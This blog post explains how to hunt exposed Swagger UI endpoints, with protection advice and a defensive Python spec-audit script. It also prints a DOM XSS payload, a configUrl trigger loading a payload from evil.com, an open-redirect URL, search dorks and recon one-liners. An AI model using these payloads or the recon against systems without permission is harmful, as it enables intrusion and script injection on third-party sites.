SWAGGER HUNTING: Finding gold in API documentation 

How misconfigured Swagger endpoints become a hacker’s playground 

What Makes Swagger a Target? 

Swagger (OpenAPI) automates API documentation, but exposed instances often reveal: 

  • All API endpoints and parameters 
  • Internal API structures 
  • Authentication mechanisms 
  • Testing interfaces 

The Danger: Developers frequently deploy Swagger UI without authentication, thinking “it’s just documentation.” 

Top Swagger Vulnerabilities 

1. Publicly Exposed Documentation 

# No authentication required 
https://api.company.com/swagger-ui.html 

Impact: Attackers get a complete API blueprint for free. 

2. DOM XSS (Versions 3.14.1-3.38.0) 

# Malicious YAML payload 
description: <math><mtext><textarea><img src=x onerror=alert(1)> 

Trigger: https://target.com/swagger-ui.html?configUrl=https://evil.com/payload.yaml 

3. Information Leakage 

  • Internal endpoints 
  • API keys in examples 
  • Server details 
  • Authentication flows 

4. Open Redirects 

https://target.com/swagger-ui.html?configUrl=https://phishing.com 

Essential Swagger Dorks 

Google Dorks 

intext:"Swagger UI" site:target.com 
inurl:"swagger-ui.html" -github 
filetype:json swagger site:target.com 
intitle:"Swagger UI" inurl:api-docs 

Shodan Queries 

http.title:"Swagger UI" 
http.favicon.hash:"-1128940573" 
http.component:"Swagger" +200 

GitHub Recon 

"swagger-ui-dist" path:package.json 
"openapi": "3.0" path:*.yaml 

Quick Discovery Methods 

Automated Scanning 

# Find subdomains with Swagger 
subfinder -d target.com | httpx -silent | grep -i swagger 

# Check common paths 
echo "target.com" | httpx -path /swagger-ui,/api-docs,/v2/api-docs 

# Nuclei scanning 
nuclei -t swagger-detection.yaml -l targets.txt 

Common Swagger Paths 

  • /swagger-ui.html 
  • /api-docs
  • /swagger 
  • /v2/api-docs 
  • /swagger.json 
  • /swagger-ui 

Real-World Attack Flow 

  1. Discovery: Find Swagger UI using dorks 
  2. Recon: Study all endpoints and auth methods 
  3. Test: Check for XSS via configUrl parameter 
  4. Exploit: Use leaked info to find deeper vulnerabilities 

Simple Protection Guide 

For Developers: 

  • Don’t expose Swagger UI in production 
  • Add authentication if needed 
  • Keep Swagger updated 
  • Disable configUrl parameter 
  • Use network restrictions 

Quick Security Check: 

# Check if your Swagger is exposed 
curl -s https://yourapi.com/swagger-ui.html | grep -q "Swagger UI" && echo "EXPOSED" 
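The curl check above only tells you whether the UI is reachable; the leakage described in section 3 lives in the spec behind it. Here is an added example (my own Python, not from the original post) that audits an OpenAPI 3 document: it flags example/default strings that sit under credential-like names or look like pasted-in keys, and lists operations that carry no security requirement, including those that opt out with security: []. The spec it runs on is a constructed sample, and the name/value patterns are assumptions you should tune to your own API.

```python
import json
import re

# Names that commonly carry credentials, and values that look like pasted-in live keys.
SENSITIVE_NAME = re.compile(r"api[_-]?key|token|secret|password|authorization", re.I)
LOOKS_LIKE_KEY = re.compile(r"^[A-Za-z0-9_\-]{24,}$")
PLACEHOLDERS = {"string", "your-api-key", "<api-key>", "xxx", "changeme"}
HTTP_METHODS = {"get", "post", "put", "patch", "delete", "options", "head"}

def _walk(node, path, findings):
    """Visit every node; record example/default strings that look like real secrets."""
    if isinstance(node, dict):
        # A parameter carries its own "name"; a schema property is named by its key.
        label = str(node.get("name") or (path[-1] if path else ""))
        for field in ("example", "default"):
            val = node.get(field)
            if isinstance(val, str) and val.lower() not in PLACEHOLDERS:
                if SENSITIVE_NAME.search(label) or LOOKS_LIKE_KEY.match(val):
                    pointer = "/" + "/".join(str(p).replace("/", "~1") for p in path + [field])
                    findings.append((pointer, label, val))
        for key, val in node.items():
            _walk(val, path + [key], findings)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, path + [i], findings)

def audit_spec(spec):
    """Return (leaked_examples, unprotected_operations) for an OpenAPI 3 document."""
    findings = []
    _walk(spec, [], findings)
    global_sec = bool(spec.get("security"))
    unprotected = []
    for route, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method.lower() in HTTP_METHODS and isinstance(op, dict):
                sec = op.get("security")  # "security: []" opts the operation out of the global requirement
                protected = bool(sec) if sec is not None else global_sec
                if not protected:
                    unprotected.append(f"{method.upper()} {route}")
    return findings, unprotected

# Constructed sample spec for the demo; no real API or key is referenced.
SAMPLE_SPEC = json.loads("""{"openapi": "3.0.0", "info": {"title": "Demo", "version": "1.0"},
 "components": {"securitySchemes": {"ApiKeyAuth": {"type": "apiKey", "in": "header", "name": "X-API-Key"}}},
 "security": [{"ApiKeyAuth": []}],
 "paths": {"/users": {
   "get": {"parameters": [{"name": "X-API-Key", "in": "header", "example": "AKIAEXAMPLE0000000000000"}]},
   "post": {"security": [], "requestBody": {"content": {"application/json": {"schema": {"properties": {
     "password": {"type": "string", "example": "hunter2"}, "sort": {"type": "string", "default": "asc"}}}}}}}},
  "/internal/debug": {"get": {"security": [], "responses": {"200": {"description": "ok"}}}}}}""")
```

Run audit_spec on the JSON your Swagger UI serves (usually the /swagger.json or /v2/api-docs path listed above) and treat every returned finding as something to scrub before the spec is published.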

Why It Matters 

For Hackers: Swagger endpoints are low-hanging fruit that often lead to: 

  • API key disclosure 
  • Internal system access 
  • XSS vulnerabilities 
  • Business logic flaws 

For Companies: One exposed Swagger UI can compromise your entire API security. 

Takeaway 

Swagger documentation is like leaving your architectural blueprints in the parking lot. It helps developers but becomes dangerous when exposed. 

Next time you’re hunting, remember to check for Swagger first – it’s often the easiest way into an API. 

Tools to Try: Nuclei, Subfinder, Httpx, Google Dorks 
Always Hunt Ethically!   
